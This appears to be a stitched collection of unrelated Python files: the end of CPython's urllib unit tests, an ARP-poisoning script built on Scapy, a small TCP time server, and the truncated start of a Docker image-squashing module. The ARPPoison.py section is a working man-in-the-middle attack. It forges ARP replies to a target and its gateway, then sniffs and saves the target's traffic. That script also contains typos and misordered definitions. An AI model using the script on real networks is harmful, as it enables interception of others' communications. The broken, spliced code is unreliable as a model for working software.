given = "a b cd e f"
expect = given.replace(' ', hexescape(' '))
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
expect = given.replace(' ', '+')
result = urllib.parse.quote_plus(given)
self.assertEqual(expect, result,
"using quote_plus(): %r != %r" % (expect, result))
def test_quoting_plus(self):
self.assertEqual(urllib.parse.quote_plus('alpha+beta gamma'),
'alpha%2Bbeta+gamma')
self.assertEqual(urllib.parse.quote_plus('alpha+beta gamma', '+'),
'alpha+beta+gamma')
# Test with bytes
self.assertEqual(urllib.parse.quote_plus(b'alpha+beta gamma'),
'alpha%2Bbeta+gamma')
# Test with safe bytes
self.assertEqual(urllib.parse.quote_plus('alpha+beta gamma', b'+'),
'alpha+beta+gamma')
def test_quote_bytes(self):
# Bytes should quote directly to percent-encoded values
given = b"\xa2\xd8ab\xff"
expect = "%A2%D8ab%FF"
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Encoding argument should raise type error on bytes input
self.assertRaises(TypeError, urllib.parse.quote, given,
encoding="latin-1")
# quote_from_bytes should work the same
result = urllib.parse.quote_from_bytes(given)
self.assertEqual(expect, result,
"using quote_from_bytes(): %r != %r"
% (expect, result))
def test_quote_with_unicode(self):
# Characters in Latin-1 range, encoded by default in UTF-8
given = "\xa2\xd8ab\xff"
expect = "%C2%A2%C3%98ab%C3%BF"
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in Latin-1 range, encoded by with None (default)
result = urllib.parse.quote(given, encoding=None, errors=None)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in Latin-1 range, encoded with Latin-1
given = "\xa2\xd8ab\xff"
expect = "%A2%D8ab%FF"
result = urllib.parse.quote(given, encoding="latin-1")
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in BMP, encoded by default in UTF-8
given = "\u6f22\u5b57" # "Kanji"
expect = "%E6%BC%A2%E5%AD%97"
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in BMP, encoded with Latin-1
given = "\u6f22\u5b57"
self.assertRaises(UnicodeEncodeError, urllib.parse.quote, given,
encoding="latin-1")
# Characters in BMP, encoded with Latin-1, with replace error handling
given = "\u6f22\u5b57"
expect = "%3F%3F" # "??"
result = urllib.parse.quote(given, encoding="latin-1",
errors="replace")
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in BMP, Latin-1, with xmlcharref error handling
given = "\u6f22\u5b57"
expect = "%26%2328450%3B%26%2323383%3B" # "漢字"
result = urllib.parse.quote(given, encoding="latin-1",
errors="xmlcharrefreplace")
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
def test_quote_plus_with_unicode(self):
# Encoding (latin-1) test for quote_plus
given = "\xa2\xd8 \xff"
expect = "%A2%D8+%FF"
result = urllib.parse.quote_plus(given, encoding="latin-1")
self.assertEqual(expect, result,
"using quote_plus(): %r != %r" % (expect, result))
# Errors test for quote_plus
given = "ab\u6f22\u5b57 cd"
expect = "ab%3F%3F+cd"
result = urllib.parse.quote_plus(given, encoding="latin-1",
errors="replace")
self.assertEqual(expect, result,
"using quote_plus(): %r != %r" % (expect, result))
class UnquotingTests(unittest.TestCase):
"""Tests for unquote() and unquote_plus()
See the doc string for quoting_Tests for details on quoting and such.
"""
def test_unquoting(self):
# Make sure unquoting of all ASCII values works
escape_list = []
for num in range(128):
given = hexescape(chr(num))
expect = chr(num)
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
result = urllib.parse.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %r != %r" %
(expect, result))
escape_list.append(given)
escape_string = ''.join(escape_list)
del escape_list
result = urllib.parse.unquote(escape_string)
self.assertEqual(result.count('%'), 1,
"using unquote(): not all characters escaped: "
"%s" % result)
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote, None)
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote, ())
with support.check_warnings(('', BytesWarning), quiet=True):
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote, b'')
def test_unquoting_badpercent(self):
# Test unquoting on bad percent-escapes
given = '%xab'
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
given = '%x'
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
given = '%'
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
# unquote_to_bytes
given = '%xab'
expect = bytes(given, 'ascii')
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r"
% (expect, result))
given = '%x'
expect = bytes(given, 'ascii')
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r"
% (expect, result))
given = '%'
expect = bytes(given, 'ascii')
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r"
% (expect, result))
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote_to_bytes, None)
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote_to_bytes, ())
def test_unquoting_mixed_case(self):
# Test unquoting on mixed-case hex digits in the percent-escapes
given = '%Ab%eA'
expect = b'\xab\xea'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
def test_unquoting_parts(self):
# Make sure unquoting works when have non-quoted characters
# interspersed
given = 'ab%sd' % hexescape('c')
expect = "abcd"
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
result = urllib.parse.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %r != %r" % (expect, result))
def test_unquoting_plus(self):
# Test difference between unquote() and unquote_plus()
given = "are+there+spaces..."
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
expect = given.replace('+', ' ')
result = urllib.parse.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %r != %r" % (expect, result))
def test_unquote_to_bytes(self):
given = 'br%C3%BCckner_sapporo_20050930.doc'
expect = b'br\xc3\xbcckner_sapporo_20050930.doc'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
# Test on a string with unescaped non-ASCII characters
# (Technically an invalid URI; expect those characters to be UTF-8
# encoded).
result = urllib.parse.unquote_to_bytes("\u6f22%C3%BC")
expect = b'\xe6\xbc\xa2\xc3\xbc' # UTF-8 for "\u6f22\u00fc"
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
# Test with a bytes as input
given = b'%A2%D8ab%FF'
expect = b'\xa2\xd8ab\xff'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
# Test with a bytes as input, with unescaped non-ASCII bytes
# (Technically an invalid URI; expect those bytes to be preserved)
given = b'%A2\xd8ab%FF'
expect = b'\xa2\xd8ab\xff'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
def test_unquote_with_unicode(self):
# Characters in the Latin-1 range, encoded with UTF-8
given = 'br%C3%BCckner_sapporo_20050930.doc'
expect = 'br\u00fcckner_sapporo_20050930.doc'
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Characters in the Latin-1 range, encoded with None (default)
result = urllib.parse.unquote(given, encoding=None, errors=None)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Characters in the Latin-1 range, encoded with Latin-1
result = urllib.parse.unquote('br%FCckner_sapporo_20050930.doc',
encoding="latin-1")
expect = 'br\u00fcckner_sapporo_20050930.doc'
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Characters in BMP, encoded with UTF-8
given = "%E6%BC%A2%E5%AD%97"
expect = "\u6f22\u5b57" # "Kanji"
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Decode with UTF-8, invalid sequence
given = "%F3%B1"
expect = "\ufffd" # Replacement character
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Decode with UTF-8, invalid sequence, replace errors
result = urllib.parse.unquote(given, errors="replace")
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Decode with UTF-8, invalid sequence, ignoring errors
given = "%F3%B1"
expect = ""
result = urllib.parse.unquote(given, errors="ignore")
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# A mix of non-ASCII and percent-encoded characters, UTF-8
result = urllib.parse.unquote("\u6f22%C3%BC")
expect = '\u6f22\u00fc'
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# A mix of non-ASCII and percent-encoded characters, Latin-1
# (Note, the string contains non-Latin-1-representable characters)
result = urllib.parse.unquote("\u6f22%FC", encoding="latin-1")
expect = '\u6f22\u00fc'
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
class urlencode_Tests(unittest.TestCase):
"""Tests for urlencode()"""
def help_inputtype(self, given, test_type):
"""Helper method for testing different input types.
'given' must lead to only the pairs:
* 1st, 1
* 2nd, 2
* 3rd, 3
Test cannot assume anything about order. Docs make no guarantee and
have possible dictionary input.
"""
expect_somewhere = ["1st=1", "2nd=2", "3rd=3"]
result = urllib.parse.urlencode(given)
for expected in expect_somewhere:
self.assertIn(expected, result,
"testing %s: %s not found in %s" %
(test_type, expected, result))
self.assertEqual(result.count('&'), 2,
"testing %s: expected 2 '&'s; got %s" %
(test_type, result.count('&')))
amp_location = result.index('&')
on_amp_left = result[amp_location - 1]
on_amp_right = result[amp_location + 1]
self.assertTrue(on_amp_left.isdigit() and on_amp_right.isdigit(),
"testing %s: '&' not located in proper place in %s" %
(test_type, result))
self.assertEqual(len(result), (5 * 3) + 2, #5 chars per thing and amps
"testing %s: "
"unexpected number of characters: %s != %s" %
(test_type, len(result), (5 * 3) + 2))
def test_using_mapping(self):
# Test passing in a mapping object as an argument.
self.help_inputtype({"1st":'1', "2nd":'2', "3rd":'3'},
"using dict as input type")
def test_using_sequence(self):
# Test passing in a sequence of two-item sequences as an argument.
self.help_inputtype([('1st', '1'), ('2nd', '2'), ('3rd', '3')],
"using sequence of two-item tuples as input")
def test_quoting(self):
# Make sure keys and values are quoted using quote_plus()
given = {"&":"="}
expect = "%s=%s" % (hexescape('&'), hexescape('='))
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
given = {"key name":"A bunch of pluses"}
expect = "key+name=A+bunch+of+pluses"
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
def test_doseq(self):
# Test that passing True for 'doseq' parameter works correctly
given = {'sequence':['1', '2', '3']}
expect = "sequence=%s" % urllib.parse.quote_plus(str(['1', '2', '3']))
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
result = urllib.parse.urlencode(given, True)
for value in given["sequence"]:
expect = "sequence=%s" % value
self.assertIn(expect, result)
self.assertEqual(result.count('&'), 2,
"Expected 2 '&'s, got %s" % result.count('&'))
def test_empty_sequence(self):
self.assertEqual("", urllib.parse.urlencode({}))
self.assertEqual("", urllib.parse.urlencode([]))
def test_nonstring_values(self):
self.assertEqual("a=1", urllib.parse.urlencode({"a": 1}))
self.assertEqual("a=None", urllib.parse.urlencode({"a": None}))
def test_nonstring_seq_values(self):
self.assertEqual("a=1&a=2", urllib.parse.urlencode({"a": [1, 2]}, True))
self.assertEqual("a=None&a=a",
urllib.parse.urlencode({"a": [None, "a"]}, True))
data = collections.OrderedDict([("a", 1), ("b", 1)])
self.assertEqual("a=a&a=b",
urllib.parse.urlencode({"a": data}, True))
def test_urlencode_encoding(self):
# ASCII encoding. Expect %3F with errors="replace'
given = (('\u00a0', '\u00c1'),)
expect = '%3F=%3F'
result = urllib.parse.urlencode(given, encoding="ASCII", errors="replace")
self.assertEqual(expect, result)
# Default is UTF-8 encoding.
given = (('\u00a0', '\u00c1'),)
expect = '%C2%A0=%C3%81'
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
# Latin-1 encoding.
given = (('\u00a0', '\u00c1'),)
expect = '%A0=%C1'
result = urllib.parse.urlencode(given, encoding="latin-1")
self.assertEqual(expect, result)
def test_urlencode_encoding_doseq(self):
# ASCII Encoding. Expect %3F with errors="replace'
given = (('\u00a0', '\u00c1'),)
expect = '%3F=%3F'
result = urllib.parse.urlencode(given, doseq=True,
encoding="ASCII", errors="replace")
self.assertEqual(expect, result)
# ASCII Encoding. On a sequence of values.
given = (("\u00a0", (1, "\u00c1")),)
expect = '%3F=1&%3F=%3F'
result = urllib.parse.urlencode(given, True,
encoding="ASCII", errors="replace")
self.assertEqual(expect, result)
# Utf-8
given = (("\u00a0", "\u00c1"),)
expect = '%C2%A0=%C3%81'
result = urllib.parse.urlencode(given, True)
self.assertEqual(expect, result)
given = (("\u00a0", (42, "\u00c1")),)
expect = '%C2%A0=42&%C2%A0=%C3%81'
result = urllib.parse.urlencode(given, True)
self.assertEqual(expect, result)
# latin-1
given = (("\u00a0", "\u00c1"),)
expect = '%A0=%C1'
result = urllib.parse.urlencode(given, True, encoding="latin-1")
self.assertEqual(expect, result)
given = (("\u00a0", (42, "\u00c1")),)
expect = '%A0=42&%A0=%C1'
result = urllib.parse.urlencode(given, True, encoding="latin-1")
self.assertEqual(expect, result)
def test_urlencode_bytes(self):
given = ((b'\xa0\x24', b'\xc1\x24'),)
expect = '%A0%24=%C1%24'
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
result = urllib.parse.urlencode(given, True)
self.assertEqual(expect, result)
# Sequence of values
given = ((b'\xa0\x24', (42, b'\xc1\x24')),)
expect = '%A0%24=42&%A0%24=%C1%24'
result = urllib.parse.urlencode(given, True)
self.assertEqual(expect, result)
def test_urlencode_encoding_safe_parameter(self):
# Send '$' (\x24) as safe character
# Default utf-8 encoding
given = ((b'\xa0\x24', b'\xc1\x24'),)
result = urllib.parse.urlencode(given, safe=":$")
expect = '%A0$=%C1$'
self.assertEqual(expect, result)
given = ((b'\xa0\x24', b'\xc1\x24'),)
result = urllib.parse.urlencode(given, doseq=True, safe=":$")
expect = '%A0$=%C1$'
self.assertEqual(expect, result)
# Safe parameter in sequence
given = ((b'\xa0\x24', (b'\xc1\x24', 0xd, 42)),)
expect = '%A0$=%C1$&%A0$=13&%A0$=42'
result = urllib.parse.urlencode(given, True, safe=":$")
self.assertEqual(expect, result)
# Test all above in latin-1 encoding
given = ((b'\xa0\x24', b'\xc1\x24'),)
result = urllib.parse.urlencode(given, safe=":$",
encoding="latin-1")
expect = '%A0$=%C1$'
self.assertEqual(expect, result)
given = ((b'\xa0\x24', b'\xc1\x24'),)
expect = '%A0$=%C1$'
result = urllib.parse.urlencode(given, doseq=True, safe=":$",
encoding="latin-1")
given = ((b'\xa0\x24', (b'\xc1\x24', 0xd, 42)),)
expect = '%A0$=%C1$&%A0$=13&%A0$=42'
result = urllib.parse.urlencode(given, True, safe=":$",
encoding="latin-1")
self.assertEqual(expect, result)
class Pathname_Tests(unittest.TestCase):
"""Test pathname2url() and url2pathname()"""
def test_basic(self):
# Make sure simple tests pass
expected_path = os.path.join("parts", "of", "a", "path")
expected_url = "parts/of/a/path"
result = urllib.request.pathname2url(expected_path)
self.assertEqual(expected_url, result,
"pathname2url() failed; %s != %s" %
(result, expected_url))
result = urllib.request.url2pathname(expected_url)
self.assertEqual(expected_path, result,
"url2pathame() failed; %s != %s" %
(result, expected_path))
def test_quoting(self):
# Test automatic quoting and unquoting works for pathnam2url() and
# url2pathname() respectively
given = os.path.join("needs", "quot=ing", "here")
expect = "needs/%s/here" % urllib.parse.quote("quot=ing")
result = urllib.request.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
expect = given
result = urllib.request.url2pathname(result)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
(expect, result))
given = os.path.join("make sure", "using_quote")
expect = "%s/using_quote" % urllib.parse.quote("make sure")
result = urllib.request.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
given = "make+sure/using_unquote"
expect = os.path.join("make+sure", "using_unquote")
result = urllib.request.url2pathname(given)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
(expect, result))
@unittest.skipUnless(sys.platform == 'win32',
'test specific to the urllib.url2path function.')
def test_ntpath(self):
given = ('/C:/', '///C:/', '/C|//')
expect = 'C:\\'
for url in given:
result = urllib.request.url2pathname(url)
self.assertEqual(expect, result,
'urllib.request..url2pathname() failed; %s != %s' %
(expect, result))
given = '///C|/path'
expect = 'C:\\path'
result = urllib.request.url2pathname(given)
self.assertEqual(expect, result,
'urllib.request.url2pathname() failed; %s != %s' %
(expect, result))
class Utility_Tests(unittest.TestCase):
"""Testcase to test the various utility functions in the urllib."""
def test_thishost(self):
"""Test the urllib.request.thishost utility function returns a tuple"""
self.assertIsInstance(urllib.request.thishost(), tuple)
class URLopener_Tests(FakeHTTPMixin, unittest.TestCase):
"""Testcase to test the open method of URLopener class."""
def test_quoted_open(self):
class DummyURLopener(urllib.request.URLopener):
def open_spam(self, url):
return url
with support.check_warnings(
('DummyURLopener style of invoking requests is deprecated.',
DeprecationWarning)):
self.assertEqual(DummyURLopener().open(
'spam://example/ /'),'//example/%20/')
# test the safe characters are not quoted by urlopen
self.assertEqual(DummyURLopener().open(
"spam://c:|windows%/:=&?~#+!$,;'@()*[]|/path/"),
"//c:|windows%/:=&?~#+!$,;'@()*[]|/path/")
@support.ignore_warnings(category=DeprecationWarning)
def test_urlopener_retrieve_file(self):
with support.temp_dir() as tmpdir:
fd, tmpfile = tempfile.mkstemp(dir=tmpdir)
os.close(fd)
fileurl = "file:" + urllib.request.pathname2url(tmpfile)
filename, _ = urllib.request.URLopener().retrieve(fileurl)
# Some buildbots have TEMP folder that uses a lowercase drive letter.
self.assertEqual(os.path.normcase(filename), os.path.normcase(tmpfile))
@support.ignore_warnings(category=DeprecationWarning)
def test_urlopener_retrieve_remote(self):
url = "http://www.python.org/file.txt"
self.fakehttp(b"HTTP/1.1 200 OK\r\n\r\nHello!")
self.addCleanup(self.unfakehttp)
filename, _ = urllib.request.URLopener().retrieve(url)
self.assertEqual(os.path.splitext(filename)[1], ".txt")
@support.ignore_warnings(category=DeprecationWarning)
def test_local_file_open(self):
# bpo-35907, CVE-2019-9948: urllib must reject local_file:// scheme
class DummyURLopener(urllib.request.URLopener):
def open_local_file(self, url):
return url
for url in ('local_file://example', 'local-file://example'):
self.assertRaises(OSError, urllib.request.urlopen, url)
self.assertRaises(OSError, urllib.request.URLopener().open, url)
self.assertRaises(OSError, urllib.request.URLopener().retrieve, url)
self.assertRaises(OSError, DummyURLopener().open, url)
self.assertRaises(OSError, DummyURLopener().retrieve, url)
# Just commented them out.
# Can't really tell why keep failing in windows and sparc.
# Everywhere else they work ok, but on those machines, sometimes
# fail in one of the tests, sometimes in other. I have a linux, and
# the tests go ok.
# If anybody has one of the problematic environments, please help!
# . Facundo
#
# def server(evt):
# import socket, time
# serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# serv.settimeout(3)
# serv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# serv.bind(("", 9093))
# serv.listen()
# try:
# conn, addr = serv.accept()
# conn.send("1 Hola mundo\n")
# cantdata = 0
# while cantdata < 13:
# data = conn.recv(13-cantdata)
# cantdata += len(data)
# time.sleep(.3)
# conn.send("2 No more lines\n")
# conn.close()
# except socket.timeout:
# pass
# finally:
# serv.close()
# evt.set()
#
# class FTPWrapperTests(unittest.TestCase):
#
# def setUp(self):
# import ftplib, time, threading
# ftplib.FTP.port = 9093
# self.evt = threading.Event()
# threading.Thread(target=server, args=(self.evt,)).start()
# time.sleep(.1)
#
# def tearDown(self):
# self.evt.wait()
#
# def testBasic(self):
# # connects
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# ftp.close()
#
# def testTimeoutNone(self):
# # global default timeout is ignored
# import socket
# self.assertIsNone(socket.getdefaulttimeout())
# socket.setdefaulttimeout(30)
# try:
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# finally:
# socket.setdefaulttimeout(None)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
#
# def testTimeoutDefault(self):
# # global default timeout is used
# import socket
# self.assertIsNone(socket.getdefaulttimeout())
# socket.setdefaulttimeout(30)
# try:
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# finally:
# socket.setdefaulttimeout(None)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
#
# def testTimeoutValue(self):
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [],
# timeout=30)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
class RequestTests(unittest.TestCase):
"""Unit tests for urllib.request.Request."""
def test_default_values(self):
Request = urllib.request.Request
request = Request("http://www.python.org")
self.assertEqual(request.get_method(), 'GET')
request = Request("http://www.python.org", {})
self.assertEqual(request.get_method(), 'POST')
def test_with_method_arg(self):
Request = urllib.request.Request
request = Request("http://www.python.org", method='HEAD')
self.assertEqual(request.method, 'HEAD')
self.assertEqual(request.get_method(), 'HEAD')
request = Request("http://www.python.org", {}, method='HEAD')
self.assertEqual(request.method, 'HEAD')
self.assertEqual(request.get_method(), 'HEAD')
request = Request("http://www.python.org", method='GET')
self.assertEqual(request.get_method(), 'GET')
request.method = 'HEAD'
self.assertEqual(request.get_method(), 'HEAD')
class URL2PathNameTests(unittest.TestCase):
def test_converting_drive_letter(self):
self.assertEqual(url2pathname("///C|"), 'C:')
self.assertEqual(url2pathname("///C:"), 'C:')
self.assertEqual(url2pathname("///C|/"), 'C:\\')
def test_converting_when_no_drive_letter(self):
# cannot end a raw string in \
self.assertEqual(url2pathname("///C/test/"), r'\\\C\test' '\\')
self.assertEqual(url2pathname("////C/test/"), r'\\C\test' '\\')
def test_simple_compare(self):
self.assertEqual(url2pathname("///C|/foo/bar/spam.foo"),
r'C:\foo\bar\spam.foo')
def test_non_ascii_drive_letter(self):
self.assertRaises(IOError, url2pathname, "///\u00e8|/")
def test_roundtrip_url2pathname(self):
list_of_paths = ['C:',
r'\\\C\test\\',
r'C:\foo\bar\spam.foo'
]
for path in list_of_paths:
self.assertEqual(url2pathname(pathname2url(path)), path)
class PathName2URLTests(unittest.TestCase):
def test_converting_drive_letter(self):
self.assertEqual(pathname2url("C:"), '///C:')
self.assertEqual(pathname2url("C:\\"), '///C:')
def test_converting_when_no_drive_letter(self):
self.assertEqual(pathname2url(r"\\\folder\test" "\\"),
'/////folder/test/')
self.assertEqual(pathname2url(r"\\folder\test" "\\"),
'////folder/test/')
self.assertEqual(pathname2url(r"\folder\test" "\\"),
'/folder/test/')
def test_simple_compare(self):
self.assertEqual(pathname2url(r'C:\foo\bar\spam.foo'),
"///C:/foo/bar/spam.foo" )
def test_long_drive_letter(self):
self.assertRaises(IOError, pathname2url, "XX:\\")
def test_roundtrip_pathname2url(self):
list_of_paths = ['///C:',
'/////folder/test/',
'///C:/foo/bar/spam.foo']
for path in list_of_paths:
self.assertEqual(pathname2url(url2pathname(path)), path)
if __name__ == '__main__':
unittest.main()
|
ARPPoison.py
|
from scapy.all import *
import os
import sys
import threading
import signal
interface = "en1"
target_ip = ""
gateway_ip = ""
packet_count = 1000
conf.iface = interface
conf.verb = 0
print "[*] Setting up %s " % interface
gateway_mac = get_mac(gateway_ip)
if gateway_mac is None:
print "Failed to get gateway MAC."
sys.exit(0)
else:
print "Gateway %s is at %s" % (gateway_ip,gateway_mac)
target_mac = get_mac(target_ip)
if target_mac is None:
print "Failed to get target Mac."
sys.exit(0)
else:
print "Target %s is at %s" % (target_ip,target_mac)
#arp poisoning starts
poison_thread = threading.Thread(target = poison_target, args = (gateway_ip, gateway_mac, target_ip, target_mac))
poison_thread.start()
try:
print "Starting sniffer for %d packets" % packet_count
bpf_filter = "ip host %s" % target_ip
packets = sniff(count = packet_count, filter=bpf_filter, iface = interface)
wrpcap('arppoison.pcap',packets)
restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
excpet KeyboardInterrupt:
restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
sys.exit(0)
def restore_target(gateway_ip,gateway_mac,target_ip,target_mac):
print "Restoring target"
send(ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc = gateway_mac), count=5)
send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc = target_mac), count=5)
os.kill(os.getpid(), signal.SIGINT)
def get_mac(ip_address):
responses,unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_addresss),timeout=2,retry=10)
for s,r in responses:
return r[Ether].src
return None
def poison_target(gateway_ip,gateway_mac,target_ip,target_mac):
poison_target = ARP()
poison_target.op = 2
poison_target.psrc = gateway_ip
poison_target.pdst = target_ip
poison_target.hwdst = target_mac
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = target_ip
poison_gateway.pdst = gateway_ip
poison_gateway.hwdst = gateway_mac
print "Beginning the ARP poison."
while True:
try:
send(poison_target)
send(poison_gateway)
time.sleep(2)
except KeyboardInterrupt:
restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
print "ARP poison attack finished."
return
|
timeserver.py
|
import socket
import threading
import argparse
import time
def run_server(host, port):
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listener.bind((host, port))
listener.listen(5)
print('Time server is listening at', port)
while True:
conn, addr = listener.accept()
threading.Thread(target=handle_client, args=(conn, addr)).start()
finally:
listener.close()
def handle_client(conn, addr):
print('New client from', addr)
try:
# Number of seconds elapsed from 1900 to 1970
time1970 = 2208988800
now = int(time.time()) + time1970
# Must send uint32 in big-endian
conn.sendall(now.to_bytes(4, byteorder='big'))
finally:
conn.close()
# Usage python echoserver.py [--port port-number]
parser = argparse.ArgumentParser()
parser.add_argument("--port", help="time server port", type=int, default=8037)
args = parser.parse_args()
run_server('', args.port)
|
image.py
|
import datetime
import docker
import hashlib
import json
import logging
import os
import re
import shutil
import six
import tarfile
import tempfile
import threading
from docker_squash.errors import SquashError, SquashUnnecessaryError
if not six.PY3:
import docker_squash.lib.xtarfile
class Chdir(object):
""" Context manager for changing the current working directory """
def __init__(self, newPath):
self.newPath = os.path.expanduser(newPath)
def __enter__(self):
self.savedPath = os.getcwd()
os.chdir(self.newPath)
def __exit__(self, etype, value, traceback):
os.chdir(self.savedPath)
class Image(object):
"""
Base class for all Docker image formats. Contains many functions that are handy
while squashing the image.
This class should not be used directly.
"""
FORMAT = None
""" Image format version """
def __init__(self, log, docker, image, from_layer, tmp_dir=None, tag=None, comment=""):
self.log = log
self.debug = self.log.isEnabledFor(logging.DEBUG)
self.docker = docker
self.image = image
self.from_layer = from_layer
self.tag = tag
self.comment = comment
self.image_name = None
self.image_tag = None
self.squash_id = None
# Workaround for https://play.golang.org/p/sCsWMXYxqy
#
# Golang doesn't add padding to microseconds when marshaling
# microseconds in date into JSON. Python does.
# We need to produce same output as Docker's to not generate
# different metadata. That's why we need to strip all zeros at the
# end of the date string...
self.date = re.sub(
r'0*Z$', 'Z', datetime.datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%S.%fZ'))
""" Date used in metadata, already formatted using the `%Y-%m-%dT%H:%M:%S.%fZ` format """
self.tmp_dir = tmp_dir
""" Main temporary directory to save all working files. This is the root directory for all other temporary files. """
def squash(self):
self._before_squashing()
ret = self._squash()
self._after_squashing()
return ret
def _squash(self):
pass
def cleanup(self):
""" Cleanup the temporary directory """
self.log.debug("Cleaning up %s temporary directory" % self.tmp_dir)
shutil.rmtree(self.tmp_dir, ignore_errors=True)
def _initialize_directories(self):
# Prepare temporary directory where all the work will be executed
try:
self.tmp_dir = self._prepare_tmp_directory(self.tmp_dir)
except:
raise SquashError("Preparing temporary directory failed")
# Temporary location on the disk of the old, unpacked *image*
self.old_image_dir = os.path.join(self.tmp_dir, "old")
# Temporary location on the disk of the new, unpacked, squashed *image*
self.new_image_dir = os.path.join(self.tmp_dir, "new")
# Temporary location on the disk of the squashed *layer*
self.squashed_dir = os.path.join(self.new_image_dir, "squashed")
for d in self.old_image_dir, self.new_image_dir:
os.makedirs(d)
def _squash_id(self, layer):
if layer == "<missing>":
self.log.warning(
"You try to squash from layer that does not have it's own ID, we'll try to find it later")
return None
try:
squash_id = self.docker.inspect_image(layer)['Id']
except:
raise SquashError(
"Could not get the layer ID to squash, please check provided 'layer' argument: %s" % layer)
if squash_id not in self.old_image_layers:
raise SquashError(
"Couldn't find the provided layer (%s) in the %s image" % (layer, self.image))
self.log.debug("Layer ID to squash from: %s" % squash_id)
return squash_id
def _validate_number_of_layers(self, number_of_layers):
"""
Makes sure that the specified number of layers to squash
is a valid number
"""
# Only positive numbers are correct
if number_of_layers <= 0:
raise SquashError(
"Number of layers to squash cannot be less or equal 0, provided: %s" % number_of_layers)
# Do not squash if provided number of layer to squash is bigger
# than number of actual layers in the image
if number_of_layers > len(self.old_image_layers):
raise SquashError(
